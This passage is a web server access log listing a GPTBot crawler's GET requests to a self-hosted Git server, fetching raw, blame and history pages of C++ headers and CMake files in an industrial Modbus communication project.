"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12703] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10085] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12704] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12018] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12918] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11874] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12726] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10495] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12896] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12613] [Gzip 6.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10410] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13610] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13028] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11491] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 